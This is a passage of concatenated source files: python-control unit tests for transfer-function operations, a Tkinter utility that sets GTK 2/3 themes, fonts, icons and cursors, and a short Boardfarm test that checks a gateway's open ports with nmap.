den2 = [[[-1.], [1., 2., 3.], [-1., -1.]],
[[-4., -3., 2.], [0., 1.], [1., 0.]]]
num3 = [[[-3., 1., 2.], [1., 6., 9.], [0.]],
[[-3., -10., -3., 2], [2., 3., 1., -2], [1., -4., 3., -4]]]
den3 = [[[3., -2., -4], [1., 2., 3., 0., 0.], [1]],
[[-12., -9., 6., 0., 0.], [2., -1., -1], [1., 0.]]]
sys1 = TransferFunction(num1, den1)
sys2 = TransferFunction(num2, den2)
sys3 = sys1 - sys2
for i in range(sys3.outputs):
for j in range(sys3.inputs):
np.testing.assert_array_equal(sys3.num[i][j], num3[i][j])
np.testing.assert_array_equal(sys3.den[i][j], den3[i][j])
# Tests for TransferFunction.__mul__
def test_multiply_scalar(self):
"""Multiply two direct feedthrough systems."""
sys1 = TransferFunction(2., [1.])
sys2 = TransferFunction(1., 4.)
sys3 = sys1 * sys2
sys4 = sys1 * sys2
np.testing.assert_array_equal(sys3.num, [[[2.]]])
np.testing.assert_array_equal(sys3.den, [[[4.]]])
np.testing.assert_array_equal(sys3.num, sys4.num)
np.testing.assert_array_equal(sys3.den, sys4.den)
def test_multiply_siso(self):
"""Multiply two SISO systems."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1])
sys2 = TransferFunction([[[-1., 3.]]], [[[1., 0., -1.]]])
sys3 = sys1 * sys2
sys4 = sys2 * sys1
np.testing.assert_array_equal(sys3.num, [[[-1., 0., 4., 15.]]])
np.testing.assert_array_equal(sys3.den, [[[1., 6., 1., -7., -2., 1.]]])
np.testing.assert_array_equal(sys3.num, sys4.num)
np.testing.assert_array_equal(sys3.den, sys4.den)
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_multiply_mimo(self):
"""Multiply two MIMO systems."""
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
num2 = [[[0., 1., 2.]],
[[1., -5.]],
[[-2., 1., 4.]]]
den2 = [[[1., 0., 0., 0.]],
[[-2., 1., 3.]],
[[4., -1., -1., 0.]]]
num3 = [[[-24., 52., -14., 245., -490., -115., 467., -95., -56., 12.,
0., 0., 0.]],
[[24., -132., 138., 345., -768., -106., 510., 41., -79., -69.,
-23., 17., 6., 0.]]]
den3 = [[[48., -92., -84., 183., 44., -97., -2., 12., 0., 0., 0., 0.,
0., 0.]],
[[-48., 60., 84., -81., -45., 21., 9., 0., 0., 0., 0., 0., 0.]]]
sys1 = TransferFunction(num1, den1)
sys2 = TransferFunction(num2, den2)
sys3 = sys1 * sys2
for i in range(sys3.outputs):
for j in range(sys3.inputs):
np.testing.assert_array_equal(sys3.num[i][j], num3[i][j])
np.testing.assert_array_equal(sys3.den[i][j], den3[i][j])
# Tests for TransferFunction.__div__
def test_divide_scalar(self):
"""Divide two direct feedthrough systems."""
sys1 = TransferFunction(np.array([3.]), -4.)
sys2 = TransferFunction(5., 2.)
sys3 = sys1 / sys2
np.testing.assert_array_equal(sys3.num, [[[6.]]])
np.testing.assert_array_equal(sys3.den, [[[-20.]]])
def test_divide_siso(self):
"""Divide two SISO systems."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1])
sys2 = TransferFunction([[[-1., 3.]]], [[[1., 0., -1.]]])
sys3 = sys1 / sys2
sys4 = sys2 / sys1
np.testing.assert_array_equal(sys3.num, [[[1., 3., 4., -3., -5.]]])
np.testing.assert_array_equal(sys3.den, [[[-1., -3., 16., 7., -3.]]])
np.testing.assert_array_equal(sys4.num, sys3.den)
np.testing.assert_array_equal(sys4.den, sys3.num)
def test_evalfr_siso(self):
"""Evaluate the frequency response of a SISO system at one frequency."""
sys = TransferFunction([1., 3., 5], [1., 6., 2., -1])
np.testing.assert_array_almost_equal(evalfr(sys, 1j),
np.array([[-0.5 - 0.5j]]))
np.testing.assert_array_almost_equal(evalfr(sys, 32j),
np.array([[0.00281959302585077 - 0.030628473607392j]]))
# Test call version as well
np.testing.assert_almost_equal(sys(1.j), -0.5 - 0.5j)
np.testing.assert_almost_equal(sys(32.j), 0.00281959302585077 - 0.030628473607392j)
# Test internal version (with real argument)
np.testing.assert_array_almost_equal(sys._evalfr(1.),
np.array([[-0.5 - 0.5j]]))
np.testing.assert_array_almost_equal(sys._evalfr(32.),
np.array([[0.00281959302585077 - 0.030628473607392j]]))
# Deprecated version of the call (should generate warning)
import warnings
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
sys.evalfr(1.)
assert len(w) == 1
assert issubclass(w[-1].category, PendingDeprecationWarning)
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_evalfr_mimo(self):
"""Evaluate the frequency response of a MIMO system at one frequency."""
num = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
sys = TransferFunction(num, den)
resp = [[0.147058823529412 + 0.0882352941176471j, -0.75, 1.],
[-0.083333333333333, -0.188235294117647 - 0.847058823529412j,
-1. - 8.j]]
np.testing.assert_array_almost_equal(sys._evalfr(2.), resp)
# Test call version as well
np.testing.assert_array_almost_equal(sys(2.j), resp)
def test_freqresp_siso(self):
"""Evaluate the magnitude and phase of a SISO system at multiple frequencies."""
sys = TransferFunction([1., 3., 5], [1., 6., 2., -1])
truemag = [[[4.63507337473906, 0.707106781186548, 0.0866592803995351]]]
truephase = [[[-2.89596891081488, -2.35619449019234,
-1.32655885133871]]]
trueomega = [0.1, 1., 10.]
mag, phase, omega = sys.freqresp(trueomega)
np.testing.assert_array_almost_equal(mag, truemag)
np.testing.assert_array_almost_equal(phase, truephase)
np.testing.assert_array_almost_equal(omega, trueomega)
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_freqresp_mimo(self):
"""Evaluate the magnitude and phase of a MIMO system at multiple frequencies."""
num = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
sys = TransferFunction(num, den)
true_omega = [0.1, 1., 10.]
true_mag = [[[0.496287094505259, 0.307147558416976, 0.0334738176210382],
[300., 3., 0.03], [1., 1., 1.]],
[[33.3333333333333, 0.333333333333333, 0.00333333333333333],
[0.390285696125482, 1.26491106406735, 0.198759144198533],
[3.01663720059274, 4.47213595499958, 104.92378186093]]]
true_phase = [[[3.7128711165168e-4, 0.185347949995695, 1.30770596539255],
[-np.pi, -np.pi, -np.pi], [0., 0., 0.]],
[[-np.pi, -np.pi, -np.pi],
[-1.66852323415362, -1.89254688119154, -1.62050658356412],
[-0.132989648369409, -1.1071487177940, -2.7504672066207]]]
mag, phase, omega = sys.freqresp(true_omega)
np.testing.assert_array_almost_equal(mag, true_mag)
np.testing.assert_array_almost_equal(phase, true_phase)
np.testing.assert_array_equal(omega, true_omega)
# Tests for TransferFunction.pole and TransferFunction.zero.
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_pole_mimo(self):
"""Test for correct MIMO poles."""
sys = TransferFunction([[[1.], [1.]], [[1.], [1.]]],
[[[1., 2.], [1., 3.]], [[1., 4., 4.], [1., 9., 14.]]])
p = sys.pole()
np.testing.assert_array_almost_equal(p, [-2., -2., -7., -3., -2.])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_double_cancelling_poles_siso(self):
H = TransferFunction([1, 1], [1, 2, 1])
p = H.pole()
np.testing.assert_array_almost_equal(p, [-1, -1])
# Tests for TransferFunction.feedback
def test_feedback_siso(self):
"""Test for correct SISO transfer function feedback."""
sys1 = TransferFunction([-1., 4.], [1., 3., 5.])
sys2 = TransferFunction([2., 3., 0.], [1., -3., 4., 0])
sys3 = sys1.feedback(sys2)
sys4 = sys1.feedback(sys2, 1)
np.testing.assert_array_equal(sys3.num, [[[-1., 7., -16., 16., 0.]]])
np.testing.assert_array_equal(sys3.den, [[[1., 0., -2., 2., 32., 0.]]])
np.testing.assert_array_equal(sys4.num, [[[-1., 7., -16., 16., 0.]]])
np.testing.assert_array_equal(sys4.den, [[[1., 0., 2., -8., 8., 0.]]])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_convert_to_transfer_function(self):
"""Test for correct state space to transfer function conversion."""
A = [[1., -2.], [-3., 4.]]
B = [[6., 5.], [4., 3.]]
C = [[1., -2.], [3., -4.], [5., -6.]]
D = [[1., 0.], [0., 1.], [1., 0.]]
sys = StateSpace(A, B, C, D)
tfsys = _convert_to_transfer_function(sys)
num = [[np.array([1., -7., 10.]), np.array([-1., 10.])],
[np.array([2., -8.]), np.array([1., -2., -8.])],
[np.array([1., 1., -30.]), np.array([7., -22.])]]
den = [[np.array([1., -5., -2.]) for _ in range(sys.inputs)]
for _ in range(sys.outputs)]
for i in range(sys.outputs):
for j in range(sys.inputs):
np.testing.assert_array_almost_equal(tfsys.num[i][j], num[i][j])
np.testing.assert_array_almost_equal(tfsys.den[i][j], den[i][j])
def test_minreal(self):
"""Try the minreal function, and also test easy entry by creation
of a Laplace variable s"""
s = TransferFunction([1, 0], [1])
h = (s + 1) * (s + 2.00000000001) / (s + 2) / (s**2 + s + 1)
hm = h.minreal()
hr = (s + 1) / (s**2 + s + 1)
np.testing.assert_array_almost_equal(hm.num[0][0], hr.num[0][0])
np.testing.assert_array_almost_equal(hm.den[0][0], hr.den[0][0])
np.testing.assert_equal(hm.dt, hr.dt)
def test_minreal_2(self):
"""This one gave a problem, due to poly([]) giving simply 1
instead of numpy.array([1])"""
s = TransferFunction([1, 0], [1])
G = 6205/(s*(s**2 + 13*s + 1281))
Heq = G.feedback(1)
H1 = 1/(s+5)
H2a = Heq/H1
H2b = H2a.minreal()
hr = 6205/(s**2+8*s+1241)
np.testing.assert_array_almost_equal(H2b.num[0][0], hr.num[0][0])
np.testing.assert_array_almost_equal(H2b.den[0][0], hr.den[0][0])
np.testing.assert_equal(H2b.dt, hr.dt)
def test_minreal_3(self):
"""Regression test for minreal of tf([1,1],[1,1])"""
g = TransferFunction([1,1],[1,1]).minreal()
np.testing.assert_array_almost_equal(1.0, g.num[0][0])
np.testing.assert_array_almost_equal(1.0, g.den[0][0])
np.testing.assert_equal(None, g.dt)
def test_minreal_4(self):
"""Check minreal on discrete TFs."""
T = 0.01
z = TransferFunction([1, 0], [1], T)
h = (z - 1.00000000001) * (z + 1.0000000001) / (z**2 - 1)
hm = h.minreal()
hr = TransferFunction([1], [1], T)
np.testing.assert_array_almost_equal(hm.num[0][0], hr.num[0][0])
np.testing.assert_equal(hr.dt, hm.dt)
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_state_space_conversion_mimo(self):
"""Test conversion of a single input, two-output state-space
system against the same TF"""
s = TransferFunction([1, 0], [1])
b0 = 0.2
b1 = 0.1
b2 = 0.5
a0 = 2.3
a1 = 6.3
a2 = 3.6
a3 = 1.0
h = (b0 + b1*s + b2*s**2)/(a0 + a1*s + a2*s**2 + a3*s**3)
H = TransferFunction([[h.num[0][0]], [(h*s).num[0][0]]],
[[h.den[0][0]], [h.den[0][0]]])
sys = _convertToStateSpace(H)
H2 = _convert_to_transfer_function(sys)
np.testing.assert_array_almost_equal(H.num[0][0], H2.num[0][0])
np.testing.assert_array_almost_equal(H.den[0][0], H2.den[0][0])
np.testing.assert_array_almost_equal(H.num[1][0], H2.num[1][0])
np.testing.assert_array_almost_equal(H.den[1][0], H2.den[1][0])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_indexing(self):
tm = ss2tf(rss(5, 3, 3))
# scalar indexing
sys01 = tm[0, 1]
np.testing.assert_array_almost_equal(sys01.num[0][0], tm.num[0][1])
np.testing.assert_array_almost_equal(sys01.den[0][0], tm.den[0][1])
# slice indexing
sys = tm[:2, 1:3]
np.testing.assert_array_almost_equal(sys.num[0][0], tm.num[0][1])
np.testing.assert_array_almost_equal(sys.den[0][0], tm.den[0][1])
np.testing.assert_array_almost_equal(sys.num[0][1], tm.num[0][2])
np.testing.assert_array_almost_equal(sys.den[0][1], tm.den[0][2])
np.testing.assert_array_almost_equal(sys.num[1][0], tm.num[1][1])
np.testing.assert_array_almost_equal(sys.den[1][0], tm.den[1][1])
np.testing.assert_array_almost_equal(sys.num[1][1], tm.num[1][2])
np.testing.assert_array_almost_equal(sys.den[1][1], tm.den[1][2])
def test_matrix_multiply(self):
"""MIMO transfer functions should be multiplyable by constant
matrices"""
s = TransferFunction([1, 0], [1])
b0 = 0.2
b1 = 0.1
b2 = 0.5
a0 = 2.3
a1 = 6.3
a2 = 3.6
a3 = 1.0
h = (b0 + b1*s + b2*s**2)/(a0 + a1*s + a2*s**2 + a3*s**3)
H = TransferFunction([[h.num[0][0]], [(h*s).num[0][0]]],
[[h.den[0][0]], [h.den[0][0]]])
H1 = (np.matrix([[1.0, 0]])*H).minreal()
H2 = (np.matrix([[0, 1.0]])*H).minreal()
np.testing.assert_array_almost_equal(H.num[0][0], H1.num[0][0])
np.testing.assert_array_almost_equal(H.den[0][0], H1.den[0][0])
np.testing.assert_array_almost_equal(H.num[1][0], H2.num[0][0])
np.testing.assert_array_almost_equal(H.den[1][0], H2.den[0][0])
def test_dcgain_cont(self):
"""Test DC gain for continuous-time transfer functions"""
sys = TransferFunction(6, 3)
np.testing.assert_equal(sys.dcgain(), 2)
sys2 = TransferFunction(6, [1, 3])
np.testing.assert_equal(sys2.dcgain(), 2)
sys3 = TransferFunction(6, [1, 0])
np.testing.assert_equal(sys3.dcgain(), np.inf)
num = [[[15], [21], [33]], [[10], [14], [22]]]
den = [[[1, 3], [2, 3], [3, 3]], [[1, 5], [2, 7], [3, 11]]]
sys4 = TransferFunction(num, den)
expected = [[5, 7, 11], [2, 2, 2]]
np.testing.assert_array_equal(sys4.dcgain(), expected)
def test_dcgain_discr(self):
"""Test DC gain for discrete-time transfer functions"""
# static gain
sys = TransferFunction(6, 3, True)
np.testing.assert_equal(sys.dcgain(), 2)
# averaging filter
sys = TransferFunction(0.5, [1, -0.5], True)
np.testing.assert_almost_equal(sys.dcgain(), 1)
# differencer
sys = TransferFunction(1, [1, -1], True)
np.testing.assert_equal(sys.dcgain(), np.inf)
# summer
# causes a RuntimeWarning due to the divide by zero
sys = TransferFunction([1,-1], [1], True)
np.testing.assert_equal(sys.dcgain(), 0)
def test_ss2tf(self):
A = np.array([[-4, -1], [-1, -4]])
B = np.array([[1], [3]])
C = np.array([[3, 1]])
D = 0
sys = ss2tf(A, B, C, D)
true_sys = TransferFunction([6., 14.], [1., 8., 15.])
np.testing.assert_almost_equal(sys.num, true_sys.num)
np.testing.assert_almost_equal(sys.den, true_sys.den)
def suite():
return unittest.TestLoader().loadTestsFromTestCase(TestXferFcn)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "joaoantoniocardoso/scripts",
"score": 3
} |
#### File: joaoantoniocardoso/scripts/setgtktheme.py
```python
from tkinter import *
from tkinter import messagebox
import os
def findThemes(themeType) :
homeDir = os.path.expanduser('~')
a = os.listdir("/usr/share/themes")
for x in a : a[a.index(x)] = "/usr/share/themes/" + x
if os.path.exists("/usr/local/share/themes") :
b = os.listdir("/usr/local/share/themes")
for x in b : b[b.index(x)] = "/usr/local/share/themes/" + x
else : b = []
if os.path.exists(homeDir + "/.themes") :
c = os.listdir(homeDir + "/.themes")
for x in c : c[c.index(x)] = homeDir + "/.themes/" + x
else : c = []
allThemes = a + b + c
final = []
for x in allThemes :
try : dirs = os.listdir(x)
except NotADirectoryError : continue
y = x.split("/")
if themeType == "gtk2" :
if "gtk-2.0" in (dirs) :
gDir = os.listdir(x + "/gtk-2.0")
if "gtkrc" in gDir :
if y[-1] not in final : final.append(y[-1])
else :
if "gtk-3.0" in (dirs) :
gDir = os.listdir(x + "/gtk-3.0")
if "gtk.css" in gDir :
if y[-1] not in final : final.append(y[-1])
#Some GTK+ 3 themes are present if GTK+ 3 itself is present, even if the
#gtk.css files are non-existent or empty. Therefore, make sure these
#themes are in the list
if themeType == "gtk3" :
#Existence of /usr/share/themes/Default/gtk-3.0 should indicate
#the presence of GTK+ 3 on the system
if "/usr/share/themes/Default" in allThemes :
if "gtk-3.0" in os.listdir("/usr/share/themes/Default") :
#As of March 2017, the presence of GTK+ 3 does not guarantee
#that the Raleigh GTK+ 3 theme is present - we now trigger a
#warning for this. See the update function.
if "Raleigh" not in final : final.append("Raleigh")
if "Adwaita" not in final : final.append("Adwaita")
if "HighContrast" not in final : final.append("HighContrast")
if "HighContrastInverse" not in final : final.append("HighContrastInverse")
if "win32" not in final : final.append("win32")
#We mustn't return an empty list so add a fallback value in this case
if final == [] : final.append("None found")
return sorted(final)
def findIcons(themeType) :
homeDir = os.path.expanduser('~')
a = os.listdir("/usr/share/icons")
for x in a : a[a.index(x)] = "/usr/share/icons/" + x
if os.path.exists("/usr/local/share/icons") :
b = os.listdir("/usr/local/share/icons")
for x in b : b[b.index(x)] = "/usr/local/share/icons/" + x
else : b = []
if os.path.exists(homeDir + "/.icons") :
c = os.listdir(homeDir + "/.icons")
for x in c : c[c.index(x)] = homeDir + "/.icons/" + x
else : c = []
allIcons = a + b + c
final = []
for x in allIcons :
try : dirs = os.listdir(x)
except NotADirectoryError : continue
y = x.split("/")
#Dir needs to contain index.theme and might well contain cursors dir. Therefore, the
#number of items within dir needs to be greater than 2 for it to contain a viable icon
#theme. For cursor theme, we only need the cursor dir.
if "index.theme" in dirs :
if themeType == "cursors" :
if "cursors" in dirs : final.append(y[-1])
else :
if len(dirs) > 2 : final.append(y[-1])
#Remove hicolor as this is a fallback icon theme that will be used anyway
if "hicolor" in final : final.remove("hicolor")
#We mustn't return an empty list so add a fallback value in this case
if final == [] : final.append("None found")
return sorted(final)
def getResource(sFile, resource) :
if resource == "gtk-button-images" or resource == "gtk-menu-images" \
or resource == "gtk-application-prefer-dark-theme" : default = 0
else : default = "None set"
homeDir = os.path.expanduser('~')
try :
if sFile == "gtk2" : file = open(homeDir + "/.gtkrc-2.0", "r")
elif sFile == "gtk3" : file = open(homeDir + "/.config/gtk-3.0/settings.ini", "r")
elif sFile == "xdg_cursor" : file = open(homeDir + "/.icons/default/index.theme", "r")
contents = file.read()
file.close()
contents = contents.split("\n")
for x in contents :
y = x.split("=")
if y[0].strip() == resource : return y[-1].strip().strip('"')
return default
except IOError :
return default
def setResource(sFile, resource, var) :
homeDir = os.path.expanduser('~')
if sFile == "gtk2" : path = homeDir + "/.gtkrc-2.0"
elif sFile == "gtk3" : path = homeDir + "/.config/gtk-3.0/settings.ini"
elif sFile == "xdg_cursor" : path = homeDir + "/.icons/default/index.theme"
if os.path.exists(path) :
#If file exists, read it and try to get find resource name line
#If found, update it
found = False
file = open(path, "r")
contents = file.read()
file.close()
contents = contents.split("\n")
contents = [x for x in contents if x != ""]
for x in contents :
y = x.split("=")
if y[0].strip() == resource :
if y[0][-1] == " " :
if sFile == "gtk2" and var.get() != "1" and var.get() != "0" : z = str(resource + " = " + '"' + var.get() + '"')
else : z = str(resource + " = " + var.get())
else :
if sFile == "gtk2" and var.get() != "1" and var.get() != "0" : z = str(resource + "=" + '"' + var.get() + '"')
else : z = str(resource + "=" + var.get())
contents[contents.index(x)] = z
found = True
break
if found :
#If file exists and resource is present, update it
file = open(path, "w")
for x in contents :
if contents.index(x) == len(contents) -1 : file.write(x)
else : file.write(x + "\n")
elif not found and contents != [] :
#If file exists and is full but resource is not present, append it
file = open(path, "w")
for x in contents :
if contents.index(x) == len(contents) -1 : file.write(x)
else : file.write(x + "\n")
if sFile == "gtk2" :
if var.get() == "1" or var.get() == "0" : file.write("\n" + resource + " = " + var.get())
else : file.write("\n" + resource + " = " + '"' + var.get() + '"')
elif sFile == "gtk3" : file.write("\n" + resource + " = " + var.get())
elif sFile == "xdg_cursor" : file.write("\n" + resource + "=" + var.get())
else :
#If file exists but is empty, overwrite it
file = open(path, "w")
if sFile == "gtk2" :
if var.get() == "1" or var.get() == "0" : file.write(resource + " = " + var.get())
else : file.write(resource + " = " + '"' + var.get() + '"')
elif sFile == "gtk3" : file.write("[Settings]\n" + resource + " = " + var.get())
elif sFile == "xdg_cursor" : file.write("[Icon Theme]\n" + resource + "=" + var.get())
file.close()
else :
#If file does not exist, create it
if sFile == "gtk3" :
try : os.makedirs(homeDir + "/.config/gtk-3.0/")
except FileExistsError : pass
elif sFile == "xdg_cursor" :
try : os.makedirs(homeDir + "/.icons/default/")
except FileExistsError : pass
file = open(path, "w")
if sFile == "gtk2" :
if var.get() == "1" or var.get() == "0" : file.write(resource + " = " + var.get())
else : file.write(resource + " = " + '"' + var.get() + '"')
elif sFile == "gtk3" : file.write("[Settings]\n" + resource + " = " + var.get())
elif sFile == "xdg_cursor" : file.write("[Icon Theme]\n" + resource + "=" + var.get())
file.close()
def endOnNewline(filePath) :
if os.path.exists(filePath) :
file = open(filePath, "r")
contents = file.read()
file.close()
if len(contents) > 0 :
if contents[-1] != '\n' :
file = open(filePath, "a")
file.write('\n')
file.close()
def update() :
changes = False
#Update GTK+ 2 theme
if ui.varOpG2.get() != getResource("gtk2", "gtk-theme-name") and ui.varOpG2.get() != "None found" :
setResource("gtk2", "gtk-theme-name", ui.varOpG2)
changes = True
#Update GTK+ 3 theme
if ui.varOpG3.get() != getResource("gtk3", "gtk-theme-name") and ui.varOpG3.get() != "None found" :
#Show a warning about GTK+ 3 Raleigh
if ui.varOpG3.get() == "Raleigh" and getResource("gtk3", "gtk-theme-name") != "Raleigh" :
messagebox.showwarning(title = "Warning", message = "The GTK+ 3 version of Raleigh was removed from GTK+ as of version 3.90.0. Despite it being listed here, it might not be present on your system.")
setResource("gtk3", "gtk-theme-name", ui.varOpG3)
changes = True
#Update GTK+ 2 and GTK+ 3 font
if ui.varOpFont.get() != getResource("gtk2", "gtk-font-name") :
setResource("gtk2", "gtk-font-name", ui.varOpFont)
changes = True
if ui.varOpFont.get() != getResource("gtk3", "gtk-font-name") :
setResource("gtk3", "gtk-font-name", ui.varOpFont)
changes = True
#Update GTK+ 2 and GTK+ 3 icons
if ui.varOpIcons.get() != getResource("gtk2", "gtk-icon-theme-name") and ui.varOpIcons.get() != "None found" :
setResource("gtk2", "gtk-icon-theme-name", ui.varOpIcons)
changes = True
if ui.varOpIcons.get() != getResource("gtk3", "gtk-icon-theme-name") and ui.varOpIcons.get() != "None found" :
setResource("gtk3", "gtk-icon-theme-name", ui.varOpIcons)
changes = True
#Update GTK+ 2, GTK+ 3 and XDG cursor theme
if ui.varOpCursors.get() != getResource("xdg_cursor", "Inherits") and ui.varOpCursors.get() != "None found" :
setResource("xdg_cursor", "Inherits", ui.varOpCursors)
changes = True
if ui.varOpCursors.get() != getResource("gtk2", "gtk-cursor-theme-name") and ui.varOpCursors.get() != "None found" :
setResource("gtk2", "gtk-cursor-theme-name", ui.varOpCursors)
changes = True
if ui.varOpCursors.get() != getResource("gtk3", "gtk-cursor-theme-name") and ui.varOpCursors.get() != "None found" :
setResource("gtk3", "gtk-cursor-theme-name", ui.varOpCursors)
changes = True
#Update images in GTK+ menus and buttons
if ui.varOpButtonImages.get() != bool(int(getResource("gtk2", "gtk-button-images"))) :
temp = StringVar()
temp.set(str(int(ui.varOpButtonImages.get())))
setResource("gtk2", "gtk-button-images", temp)
setResource("gtk3", "gtk-button-images", temp)
changes = True
if ui.varOpMenuImages.get() != bool(int(getResource("gtk2", "gtk-menu-images"))) :
temp = StringVar()
temp.set(str(int(ui.varOpMenuImages.get())))
setResource("gtk2", "gtk-menu-images", temp)
setResource("gtk3", "gtk-menu-images", temp)
changes = True
#Update dark theme
if ui.varOpDarkTheme.get() != bool(int(getResource("gtk3", "gtk-application-prefer-dark-theme"))) :
temp = StringVar()
temp.set(str(int(ui.varOpDarkTheme.get())))
setResource("gtk3", "gtk-application-prefer-dark-theme", temp)
changes = True
#Ensure that the last char in all files is a newline
homeDir = os.path.expanduser('~')
endOnNewline(homeDir + "/.gtkrc-2.0")
endOnNewline(homeDir + "/.config/gtk-3.0/settings.ini")
endOnNewline(homeDir + "/.icons/default/index.theme")
#Show completion message
if changes : messagebox.showinfo(title = "Complete!", message = "Restart your applications for the settings to take effect.")
else : messagebox.showinfo(title = "Complete!", message = "Settings files were already up to date. No changes were made.")
def darkThemeNote() :
if ui.varOpDarkTheme.get() :
messagebox.showinfo(title = "Note", message = "A dark theme variant is available only for some GTK+ 3 themes such as Adwaita.")
def reset() :
rmFilesFailed = False
question = "The following files will be deleted:\n\n ~/.gtkrc-2.0\n ~/.config/gtk-3.0/settings.ini\n ~/.icons/default/index.theme\n\nDo you want to continue?"
choice = messagebox.askyesno(title = "Reset", message = question)
if choice :
homeDir = os.path.expanduser('~')
try : os.remove(homeDir + "/.gtkrc-2.0")
except FileNotFoundError : pass
except IOError : rmFilesFailed = True
try : os.remove(homeDir + "/.config/gtk-3.0/settings.ini")
except FileNotFoundError : pass
except IOError : rmFilesFailed = True
try : os.remove(homeDir + "/.icons/default/index.theme")
except FileNotFoundError : pass
except IOError : rmFilesFailed = True
if rmFilesFailed : messagebox.showerror(title = "Error", message = "Errors occured whilst removing the settings files.")
ui.varOpG2.set(getResource("gtk2", "gtk-theme-name"))
ui.varOpG3.set(getResource("gtk3", "gtk-theme-name"))
ui.varOpFont.delete(0, len(ui.varOpFont.get()))
ui.varOpFont.insert(0, getResource("gtk2", "gtk-font-name"))
ui.varOpIcons.set(getResource("gtk2", "gtk-icon-theme-name"))
ui.varOpCursors.set(getResource("xdg_cursor", "Inherits"))
ui.varOpButtonImages.set(getResource("gtk2", "gtk-button-images"))
ui.varOpMenuImages.set(getResource("gtk2", "gtk-menu-images"))
ui.varOpDarkTheme.set(getResource("gtk3", "gtk-application-prefer-dark-theme"))
class UI() :
def __init__(self, parent) :
parent.title("Set GTK+ theme")
l1 = Label(parent, text = "Set the theme for GTK+ 2 and 3 applications", pady = 5, padx = 15, relief = RAISED)
l1.grid(row = 1, column = 1, columnspan = 2)
#GTK+ 2 section
l2 = Label(parent, text = "GTK+ 2 theme:", pady = 7, padx = 5).grid(row = 2, column = 1, sticky = W)
self.varOpG2 = StringVar(parent)
self.varOpG2.set(getResource("gtk2", "gtk-theme-name"))
themesG2 = findThemes("gtk2")
m1 = OptionMenu(parent, self.varOpG2, *themesG2).grid(row = 2, column = 2, sticky = W)
#GTK+ 3 section
l3 = Label(parent, text = "GTK+ 3 theme:", pady = 7, padx = 5).grid(row = 3, column = 1, sticky = W)
self.varOpG3 = StringVar(parent)
self.varOpG3.set(getResource("gtk3", "gtk-theme-name"))
themesG3 = findThemes("gtk3")
m2 = OptionMenu(parent, self.varOpG3, *themesG3).grid(row = 3, column = 2, sticky = W)
#Hereafter, we're not supporting seperate settings for GTK+ 2 and GTK+ 3.
#Font section
l4 = Label(parent, text = "GTK+ font:", pady = 7, padx = 5).grid(row = 4, column = 1, sticky = W)
self.varOpFont = Entry(parent)
self.varOpFont.grid(row = 4, column = 2, sticky = W)
self.varOpFont.insert(0, getResource("gtk2", "gtk-font-name"))
#Icons section
l5 = Label(parent, text = "GTK+ icons:", pady = 7, padx = 5).grid(row = 5, column = 1, sticky = W)
self.varOpIcons = StringVar(parent)
self.varOpIcons.set(getResource("gtk2", "gtk-icon-theme-name"))
icons = findIcons("icons")
m3 = OptionMenu(parent, self.varOpIcons, *icons).grid(row = 5, column = 2, sticky = W)
#Cursors section
l6 = Label(parent, text = "GTK+ cursors:", pady = 7, padx = 5).grid(row = 6, column = 1, sticky = W)
self.varOpCursors = StringVar(parent)
self.varOpCursors.set(getResource("xdg_cursor", "Inherits"))
cursors = findIcons("cursors")
m4 = OptionMenu(parent, self.varOpCursors, *cursors).grid(row = 6, column = 2, sticky = W)
#Button and menu images section
self.varOpButtonImages = BooleanVar(parent)
self.varOpMenuImages = BooleanVar(parent)
self.varOpButtonImages.set(getResource("gtk2", "gtk-button-images"))
self.varOpMenuImages.set(getResource("gtk2", "gtk-menu-images"))
imgButtonCheckbox = Checkbutton(parent, variable = self.varOpButtonImages, text = "Images in buttons", pady = 3).grid(row = 7, column = 1, sticky = W)
imgMenuCheckbox = Checkbutton(parent, variable = self.varOpMenuImages, text = "Images in menus", pady = 3).grid(row = 7, column = 2, sticky = W)
#Dark theme section
self.varOpDarkTheme = BooleanVar(parent)
self.varOpDarkTheme.set(getResource("gtk3", "gtk-application-prefer-dark-theme"))
darkThemeCheckbox = Checkbutton(parent, variable = self.varOpDarkTheme, text = "Use dark theme", command = darkThemeNote, pady = 3).grid(row = 8, column = 1, sticky = W)
#Buttons
b1 = Button(parent, text = "Close", padx = 5, pady = 5, bd = 3, command = parent.destroy).grid(row = 9, column = 1, sticky = W)
b2 = Button(parent, text = "Update", padx = 5, pady = 5, bd = 3, command = update).grid(row = 9, column = 2, sticky = E)
b3 = Button(parent, text = "Reset", padx = 5, pady = 5, bd= 3, command = reset).grid(row = 9, column = 1, columnspan = 2)
top = Tk()
ui = UI(top)
top.mainloop()
``` |
{
"source": "joaoantoniopereira/Boardfarm",
"score": 2
} |
#### File: Boardfarm/tests/test_nmap.py
```python
import random
import re
import rootfs_boot
from devices import board, lan, prompt
class TestNmap(rootfs_boot.RootFSBootTest):
def boot(self, reflash=True):
pass
def runTest(self):
lan.sendline('\nsudo nmap -p 20,21,22,23,53,80,443 192.168.1.254')
lan.expect(r'20/tcp.*?filtered', timeout=100)
lan.expect(r'21/tcp.*?open', timeout=100)
lan.expect(r'22/tcp.*?open', timeout=100)
lan.expect(r'23/tcp.*?open', timeout=100)
lan.expect(r'53/tcp.*?open', timeout=100)
lan.expect(r'80/tcp.*?open', timeout=100)
